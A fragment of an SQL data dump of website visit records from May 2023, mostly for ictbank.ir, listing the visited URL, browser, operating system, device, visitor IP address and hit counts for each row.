(32904,'2023-05-18','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.236.231','000',0,1,0),
(32905,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.46','000',0,1,0),
(32906,'2023-05-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(32907,'2023-05-18','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','85.208.136.198','000',0,1,0),
(32908,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,1,0),
(32909,'2023-05-18','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','50.87.144.124','000',0,1,0),
(32910,'2023-05-18','https://ictbank.ir/hooman/admin/','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.171.74','000',0,48,0),
(32911,'2023-05-18','https://nikoo-academy.com/davood-fadaee','Chrome','Android','96.0.0.0','mobile:smart','Galaxy A21s','','86.55.97.147','000',0,10,0),
(32912,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','128.90.102.40','000',0,10,0),
(32913,'2023-05-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(32914,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.77','000',0,2,0),
(32915,'2023-05-18','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.55.224.14','000',0,2,0),
(32916,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.161.178','000',0,1,0),
(32917,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','45.158.49.95','000',0,2,0),
(32918,'2023-05-18','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','45.79.203.254','000',0,1,0),
(32919,'2023-05-18','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','188.40.168.71','000',0,1,0),
(32920,'2023-05-18','https://ictbank.ir/blog','Chrome','Linux','113.0.0.0','desktop','Unknown','','100.21.218.158','000',0,1,0),
(32921,'2023-05-18','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','51.91.103.92','000',0,1,0),
(32922,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.236.203.105','000',0,1,0),
(32923,'2023-05-18','https://ictbank.ir/productmatrix/admin/index.php?pid=customers','Chrome','OS X','113.0.0.0','desktop','Macintosh','','89.196.248.253','000',0,9,0),
(32924,'2023-05-18','https://ictbank.ir/blog','Chrome','Linux','112.0.0.0','desktop','Unknown','','44.227.127.2','000',0,1,0),
(32925,'2023-05-18','http://design-arena.ir','Firefox','OS X','33.0','desktop','Macintosh','','104.244.78.233','000',0,1,0),
(32926,'2023-05-18','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.159.138.6','000',0,1,0),
(32927,'2023-05-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(32928,'2023-05-18','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','38.107.215.29','000',0,2,0),
(32929,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','66.33.206.245','000',0,2,0),
(32930,'2023-05-18','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','104.248.1.96','000',0,2,0),
(32931,'2023-05-18','https://ictbank.ir/hooman/admin/','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.238.108.218','000',0,107,0),
(32932,'2023-05-18','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','85.185.85.194','000',0,1,0),
(32933,'2023-05-18','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','148.72.209.73','000',0,1,0),
(32934,'2023-05-18','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','185.237.85.7','000',0,1,0),
(32935,'2023-05-18','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(32936,'2023-05-18','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(32937,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,1,0),
(32938,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,1,0),
(32939,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','165.22.180.45','000',0,1,0),
(32940,'2023-05-18','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','35.167.219.39','000',0,1,0),
(32941,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','192.64.4.26','000',0,10,0),
(32942,'2023-05-18','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.142.236.43','000',0,2,0),
(32943,'2023-05-18','https://ictbank.ir/blog','Chrome','OS X','104.0.0.0','desktop','Macintosh','','54.157.245.5','000',0,2,0),
(32944,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','67.205.41.35','000',0,2,0),
(32945,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','111.0.0.0','desktop','Unknown','','38.242.219.53','000',0,2,0),
(32946,'2023-05-18','https://l.instagram.com/','Instagram','iOS','281.0.0.0.0','mobile:smart','iPhone XR','','46.101.25.191','000',0,4,0),
(32947,'2023-05-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(32948,'2023-05-18','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','35.88.43.78','000',0,1,0),
(32949,'2023-05-19','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','216.151.184.111','000',0,5,0),
(32950,'2023-05-19','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,6,0),
(32951,'2023-05-19','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.135.149.34','000',0,1,0),
(32952,'2023-05-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(32953,'2023-05-19','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(32954,'2023-05-19','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','34.212.37.29','000',0,1,0),
(32955,'2023-05-19','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','212.237.233.32','000',0,2,0),
(32956,'2023-05-19','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(32957,'2023-05-19','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.30.24','000',0,2,0),
(32958,'2023-05-19','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.201.83','000',0,1,0),
(32959,'2023-05-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(32960,'2023-05-19','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.77','000',0,3,0),
(32961,'2023-05-19','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(32962,'2023-05-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,4,0),
(32963,'2023-05-19','https://ictbank.ir/blog','Samsung Internet','Android','2.0','mobile:smart','Galaxy Note 4','','68.235.43.86','000',0,1,0),
(32964,'2023-05-19','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(32965,'2023-05-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,4,0),
(32966,'2023-05-19','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','178.150.222.54','000',0,1,0),
(32967,'2023-05-19','https://ictbank.ir/blog','Safari','OS X','3.0.0','desktop','Macintosh','','199.195.253.156','000',0,1,0),
(32968,'2023-05-19','https://ictbank.ir/blog','Safari','OS X','3.0.0','desktop','Macintosh','','192.42.116.191','000',0,1,0),
(32969,'2023-05-19','https://ictbank.ir/blog','Safari','OS X','3.0.0','desktop','Macintosh','','194.26.192.142','000',0,2,0),
(32970,'2023-05-19','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.236.131.159','000',0,1,0),
(32971,'2023-05-19','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32972,'2023-05-19','https://ictbank.ir/blog','Vivaldi','Windows','5.0.0.0','desktop','Unknown','','45.88.97.247','000',0,2,0),
(32973,'2023-05-19','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S8 Active','','141.98.6.198','000',0,1,0),
(32974,'2023-05-19','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','212.71.237.67','000',0,1,0),
(32975,'2023-05-19','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,4,0),
(32976,'2023-05-19','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.117.110','000',0,1,0),
(32977,'2023-05-19','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.185.4.69','000',0,1,0),
(32978,'2023-05-19','https://ictbank.ir/productmatrix/admin/index.php?pid=customers','Chrome','OS X','113.0.0.0','desktop','Macintosh','','188.210.81.222','000',0,85,0),
(32979,'2023-05-19','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','54.83.91.231','000',0,1,0),
(32980,'2023-05-19','https://ictbank.ir/blog','Chrome','Windows','112.0.0.0','desktop','Unknown','','23.229.104.2','000',0,1,0),
(32981,'2023-05-19','https://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','103.0.0.0','desktop','Unknown','','176.37.117.74','000',0,4,0),
(32982,'2023-05-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(32983,'2023-05-19','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(32984,'2023-05-19','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','51.255.144.79','000',0,1,0),
(32985,'2023-05-19','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','75.119.200.14','000',0,1,0),
(32986,'2023-05-19','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','192.71.42.108','000',0,1,0),
(32987,'2023-05-19','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','192.71.142.35','000',0,1,0),
(32988,'2023-05-19','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','192.71.2.171','000',0,1,0),
(32989,'2023-05-19','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','192.36.248.249','000',0,1,0),
(32990,'2023-05-19','https://ictbank.ir/blog','Chrome','Linux','58.0.0.0','desktop','Unknown','','23.20.221.204','000',0,1,0),
(32991,'2023-05-19','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','167.71.254.205','000',0,2,0),
(32992,'2023-05-19','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(32993,'2023-05-19','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','38.107.215.29','000',0,2,0),
(32994,'2023-05-19','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','23.129.64.213','000',0,1,0),
(32995,'2023-05-19','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','185.220.101.19','000',0,1,0),
(32996,'2023-05-19','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','162.247.74.204','000',0,1,0),
(32997,'2023-05-19','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','185.220.100.251','000',0,1,0),
(32998,'2023-05-19','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','210.116.91.94','000',0,1,0),
(32999,'2023-05-19','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','62.210.215.74','000',0,1,0),
(33000,'2023-05-19','https://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','88.99.136.18','000',0,1,0),
(33001,'2023-05-19','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(33002,'2023-05-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(33003,'2023-05-20','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(33004,'2023-05-20','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.55','000',0,119,0),
(33005,'2023-05-20','https://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','103.0.0.0','desktop','Unknown','','176.37.117.74','000',0,4,0),
(33006,'2023-05-20','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.43.62','000',0,1,0),
(33007,'2023-05-20','https://ictbank.ir/blog','Chrome','OS X','76.0.0.0','desktop','Macintosh','','8.219.92.159','000',0,2,0),
(33008,'2023-05-20','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.126','000',0,41,0),
(33009,'2023-05-20','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','38.107.215.29','000',0,2,0),
(33010,'2023-05-20','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(33011,'2023-05-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.236.203.105','000',0,1,0),
(33012,'2023-05-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(33013,'2023-05-20','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','94.23.31.9','000',0,1,0),
(33014,'2023-05-20','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','167.114.24.140','000',0,1,0),
(33015,'2023-05-20','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','103.93.59.155','000',0,1,0),
(33016,'2023-05-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.55.162','000',0,1,0),
(33017,'2023-05-20','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(33018,'2023-05-20','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.14','000',0,1,0),
(33019,'2023-05-20','https://ictbank.ir/productmatrix/admin/index.php?pid=customers','Chrome','OS X','113.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,13,0),
(33020,'2023-05-20','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.212','000',0,1,0),
(33021,'2023-05-20','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.251','000',0,1,0),
(33022,'2023-05-20','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','101.68.211.2','000',0,6,0),
(33023,'2023-05-20','https://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','4.227.254.95','000',0,1,0),
(33024,'2023-05-20','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(33025,'2023-05-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(33026,'2023-05-20','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','97.107.138.245','000',0,1,0),
(33027,'2023-05-20','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','93.113.110.128','000',0,1,0),
(33028,'2023-05-20','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','14.63.221.211','000',0,1,0),
(33029,'2023-05-20','https://ictbank.ir/blog','Firefox','Ubuntu','110.0','desktop','Unknown','','216.151.184.111','000',0,1,0),
(33030,'2023-05-20','https://ictbank.ir/blog','Chrome','Windows','111.0.0.0','desktop','Unknown','','216.151.184.111','000',0,1,0),
(33031,'2023-05-20','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(33032,'2023-05-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(33033,'2023-05-20','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','114.7.149.178','000',0,1,0),
(33034,'2023-05-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.177.98','000',0,1,0),
(33035,'2023-05-20','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.251.110','000',0,1,0),
(33036,'2023-05-20','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','8.213.133.205','000',0,2,0),
(33037,'2023-05-20','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','31.7.105.80','000',0,110,0),
(33038,'2023-05-20','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.109','000',0,1,0),
(33039,'2023-05-20','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.101','000',0,1,0),
(33040,'2023-05-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.137.0','000',0,1,0),
(33041,'2023-05-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(33042,'2023-05-20','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,1,0),
(33043,'2023-05-20','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.178.54','000',0,3,0),
(33044,'2023-05-20','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.132.194','000',0,1,0),
(33045,'2023-05-20','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(33046,'2023-05-20','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.189','000',0,1,0),
(33047,'2023-05-20','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','46.228.199.158','000',0,1,0),
(33048,'2023-05-20','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','109.74.199.205','000',0,1,0),
(33049,'2023-05-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(33050,'2023-05-20','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.98','000',0,1,0),
(33051,'2023-05-20','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.11','000',0,1,0),
(33052,'2023-05-20','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.115','000',0,1,0),
(33053,'2023-05-20','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.69','000',0,1,0),
(33054,'2023-05-20','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','104.234.197.139','000',0,1,0),
(33055,'2023-05-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','23.90.160.146','000',0,1,0),
(33056,'2023-05-20','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','185.254.37.239','000',0,1,0),
(33057,'2023-05-20','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(33058,'2023-05-20','https://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.74','000',0,2,0),
(33059,'2023-05-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.207.198','000',0,1,0),
(33060,'2023-05-20','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.92','000',0,1,0),
(33061,'2023-05-20','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.90','000',0,3,0),
(33062,'2023-05-20','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','102.129.149.147','000',0,1,0),
(33063,'2023-05-21','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,5,0),
(33064,'2023-05-21','http://design-arena.ir','Firefox','Windows','30.0','desktop','Unknown','','185.129.62.63','000',0,1,0),
(33065,'2023-05-21','https://ictbank.ir/blog','WebKit Nightly Build','Windows','Unknown','desktop','Unknown','','104.192.3.74','000',0,1,0),
(33066,'2023-05-21','https://ictbank.ir/blog','WebKit Nightly Build','Windows','Unknown','desktop','Unknown','','104.244.77.5','000',0,1,0),
(33067,'2023-05-21','https://ictbank.ir/blog','WebKit Nightly Build','Windows','Unknown','desktop','Unknown','','107.189.4.83','000',0,2,0),
(33068,'2023-05-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(33069,'2023-05-21','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(33070,'2023-05-21','https://ictbank.ir/blog','Chrome','Android','83.0.0.0','mobile:smart','Redmi 4X','','81.91.189.244','000',0,1,0),
(33071,'2023-05-21','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.156.152.225','000',0,1,0),
(33072,'2023-05-21','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(33073,'2023-05-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,4,0),
(33074,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(33075,'2023-05-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(33076,'2023-05-21','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.178.123','000',0,138,0),
(33077,'2023-05-21','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','141.98.6.47','000',0,1,0),
(33078,'2023-05-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','176.109.228.30','000',0,2,0),
(33079,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.101.240','000',0,1,0),
(33080,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(33081,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','188.166.94.189','000',0,2,0),
(33082,'2023-05-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(33083,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','198.58.105.128','000',0,1,0),
(33084,'2023-05-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(33085,'2023-05-21','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','154.0.163.178','000',0,1,0),
(33086,'2023-05-21','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.21.62','000',0,1,0),
(33087,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(33088,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','212.71.249.184','000',0,3,0),
(33089,'2023-05-21','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(33090,'2023-05-21','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,2,0),
(33091,'2023-05-21','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,1,0),
(33092,'2023-05-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(33093,'2023-05-21','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','192.3.24.84','000',0,1,0),
(33094,'2023-05-21','https://l.instagram.com/','Instagram','iOS','283.0.0.0.0','mobile:smart','iPhone 12 Pro','','5.78.60.81','000',0,2,0),
(33095,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','171.13.14.83','000',0,2,0),
(33096,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(33097,'2023-05-21','https://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.129.17','000',0,2,0),
(33098,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','128.90.102.40','000',0,1,0),
(33099,'2023-05-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(33100,'2023-05-21','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','45.40.56.4','000',0,3,0),
(33101,'2023-05-21','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','159.89.235.72','000',0,1,0),
(33102,'2023-05-22','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.213','000',0,1,0),
(33103,'2023-05-22','https://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(33104,'2023-05-22','https://ictbank.ir/blog','Firefox','Fedora','90.0','desktop','Unknown','','185.245.80.185','000',0,2,0),
(33105,'2023-05-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,4,0),
(33106,'2023-05-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(33107,'2023-05-22','https://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,1,0),
(33108,'2023-05-22','https://neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.41.193','000',0,2,0),
(33109,'2023-05-22','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(33110,'2023-05-22','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.118.120','000',0,1,0),
(33111,'2023-05-22','https://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,3,0),
(33112,'2023-05-22','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(33113,'2023-05-22','https://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(33114,'2023-05-22','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.51.222','000',0,1,0),
(33115,'2023-05-22','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.44.114','000',0,1,0),
(33116,'2023-05-22','https://www.ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,1,0),
(33117,'2023-05-22','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S8 Active','','4.227.254.95','000',0,1,0),
(33118,'2023-05-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,4,0),
(33119,'2023-05-22','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(33120,'2023-05-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
